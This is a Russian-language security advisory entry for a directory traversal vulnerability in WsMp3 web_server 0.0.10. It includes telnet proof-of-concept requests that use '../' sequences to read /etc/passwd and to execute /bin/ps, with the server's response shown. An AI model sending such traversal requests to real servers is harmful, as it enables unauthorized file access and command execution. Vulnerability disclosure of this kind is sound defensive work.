| Дата публикации: | 26.05.2003 |
| Всего просмотров: | 1123 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость обхода каталога обнаружена в 'WsMp3 web_server'. Удаленный пользователь может просматривать файлы на системе. Удаленный пользователь может выполнять произвольные программы на системе.
Сообщается, что удаленный пользователь может представить специально обработанный HTTP GET запрос, содержащий последовательность '../', чтобы просматривать произвольные файлы на системе с привилегиями Web демона. Пример: bash$ telnet wsmp3.server.com 8000 Trying 61.37.xxx.xx... Connected to 61.37.xxx.xx. Escape character is '^]'. GET /dir/../../../../../../etc/passwd HTTP/1.0также сообщается, что удаленный пользователь может представить специально обработанный HTTP POST запрос, чтобы выполнить произвольные программы на системе. Пример: bash$ telnet wsmp3.server.com 8000 Trying 61.37.xxx.xx... Connected to 61.37.xxx.xx. Escape character is '^]'. POST /dir/../../../../../../bin/ps HTTP/1.0 HTTP/1.1 200 OK Connection: close Content-Type: text/html Date: Sat May 03 01:25:28 2003 Last-Modified: Sat May 03 01:25:28 2003 Content-Length: 201 PID TTY TIME CMD 29529 pts/2 00:00:00 login 29559 pts/2 00:00:00 su 29560 pts/2 00:00:00 bash 29681 pts/2 00:00:10 WsMp3 29730 pts/2 00:00:00 WsMp3 29731 pts/2 00:00:00 psУязвимость обнаружена в WsMp3 web_server 0.0.10 |
| Ссылки: | WsMP3d Directory Traversing Vulnerability |